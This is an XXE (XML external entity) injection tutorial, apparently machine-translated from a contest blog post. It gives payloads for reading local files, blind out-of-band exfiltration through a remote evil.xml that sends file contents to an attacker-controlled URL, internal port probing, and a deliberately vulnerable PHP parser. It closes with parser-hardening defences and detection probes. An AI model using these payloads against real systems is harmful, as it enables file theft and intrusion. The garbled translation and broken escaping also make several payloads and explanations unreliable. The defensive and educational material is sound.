I am participating in the Mid-Autumn Festival Creative Submission contest. Please see:Mid-Autumn Festival Creative Submission Contest 0x01: Knowledge preparation
XXE is XML External Entity Injection, which is caused by the External Entity forged by the attacker when the program parses the input XML data. For example, simplexml\\ _load in PHP resolves external entities by default. The signature function with XXE vulnerability is simplexml\\ _load_string ().Copy the code
XML entities fall into four categories: character entities, named entities, external entities, and parameter entities
1, named entity writing:
<? The XML version = "1.0" encoding = "utf-8"? > <! DOCTYPE ANY \\\[ <!ENTITY xxe SYSTEM "file:///c://test/1.txt" >\\\]> <value>&xxe; </value> <? The XML version = "1.0" encoding = "utf-8"? > <! DOCTYPE ANY \\\[ <!ENTITY xxe SYSTEM "http://otherhost/xxxx.php" >\\\]> <value>&xxe; </value>Copy the code
Xxe + SSRF 2, named entity + external entity
<? The XML version = "1.0" encoding = "utf-8"? > <! DOCTYPE root \\\[ <!ENTITY dtd SYSTEM "http://localhost:88/evil.xml"> \\\]> <value>&dtd; </value>Copy the code
Evil. XML can’t define an entity, otherwise it won’t be able to parse. It’s easy to use named entities, but parameter entities are more useful.
<? The XML version = "1.0" encoding = "utf-8"? > <! DOCTYPE data \\\[ <!ENTITY % file SYSTEM "file:///c://test/1.txt"> <! ENTITY % dtd SYSTEM "http://localhost:88/evil.xml"> %dtd; %all; \\\]> <value>&send; </value>Copy the code
The evil. XML file is
<! ENTITY % all "<! ENTITY send SYSTEM 'http://localhost:88%file; "> >"Copy the code
The invocation process is as follows: The parameter entity DTD calls the external entity evil. XML, then the parameter entity all, and then the named entity Send
Second named entity + external entity + parameter entity
<? The XML version = "1.0" encoding = "utf-8"? > <! DOCTYPE root \\\[ <!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=c:/test/1.txt"> <! ENTITY % dtd SYSTEM "http://localhost:88/evil.xml"> %dtd; %send; \\\]> <root></root>Copy the code
The evil. XML file is as follows:
<! ENTITY % payload "<! ENTITY % send SYSTEM 'http://localhost:88/? content=%file; '>"> %payload;Copy the code
The call procedure is similar to the first method
0x02.xxE Attack Prepare a file with XXE vulnerability
<? php $xml=file\\\_get\\\_contents("php://input"); $data = simplexml\\\_load\\\_string($xml) ; echo "<pre>" ; print_r($data) ; // Comment out the statement and there is no echo. >Copy the code
Xxe mainly uses: arbitrary file reading, Intranet information detection (including port and related Web fingerprint identification), DOS attack, remote naming execution POC mainly includes:
file:///path/to/file.ext
http://url/file.ext
php://filter/read=convert.base64-encode/resource=conf.php
Copy the code
Different programs support different protocols
1. Arbitrary file reading:
1). There is a direct echo situation: can see 1, named entity writing method, according to the actual situation to replace the corresponding code can be used, I local test copy
3, the first named entity + external entity + parameter entity writing method and the second named entity + external entity + parameter entity writing method:
C ://test/1. TXT Contains 111111111, which can be seen in Apache logs
: : 1 - \ \ \ [23 / Apr / 2017:17:37:13 + 0800 \ \ \] "GET / 111111111 HTTP / 1.0", 404, 207Copy the code
If the http://localhost:88/evil.xml replace XML files to a remote server address, you can see in the log data we want to achieve
The second way is as follows:
2. Intranet information detection
Using HTTP protocolhttp://url/file.ext, replace the corresponding part of the standard POC, this situation is unstable, according to different XML parsers will get different error results, for example, I 87 closed, port 88 has web service
Some have no obvious connection error message, so it is impossible to determine the status of the port
4. Remote command execution under PHP requires expect extensions
0x03 Trampled pit
1. It is normal to read any TXT file, but an error occurs when reading PHP file. Because PHP files themselves contain characters like <, Using PHP: / / filter base64 encoding around PHP: / / filter/read. = the convert base64 encode/resource = http://localhost:88/exponent/index.php 2. Evil. XML file pairs in the second named entity + external entity + parameter entity notation
<! ENTITY % payload "<! ENTITY % send SYSTEM 'http://localhost:88/? content=%file; '>"> %payload;Copy the code
wrong
<! ENTITY % payload "<! ENTITY % send SYSTEM 'http://localhost:88/? content=%file; '>"> %payload;Copy the code
The innermost nesting must be character entities. 3. Parameter entities (that is, with %) can only be found in DTDS (
), other entities should start with ‘&’, ‘; 4. Don’t understand why it is necessary to have 3 level entities nested correctly when there is no echo, 2 level entities are not nested correctly (evil. XML is written as
or
)
0 x04. Defense
PHP: libxml_disable_entity_loader (true); JAVA: DocumentBuilderFactory dbf =DocumentBuilderFactory.newInstance(); dbf.setExpandEntityReferences(false); Python: From LXML import etree
xmlData = etree.parse(xmlSource,etree.XMLParser(resolve_entities=False))
0 x05 find XXE
1. Check whether XML is parsed
<? The XML version = "1.0" encoding = "ISO - 8859-1"? > <Prod> <Prod> <Type>abc</type> <name>Bugcrowd</name> <id>21</id> </Prod> </Prod>Copy the code
2. Check whether external entity resolution is supported
<? The XML version = "1.0" encoding = "ISO - 8859-1"? > <! DOCTYPE testingxxe \\\[<! ENTITY xxe SYSTEM "http://YOURIP/TEST.ext" >\\\]> <Prod> <Prod> <Type>abc</type> <name>Bugcrowd</name> <id>&xxe</id> </Prod> </Prod>Copy the code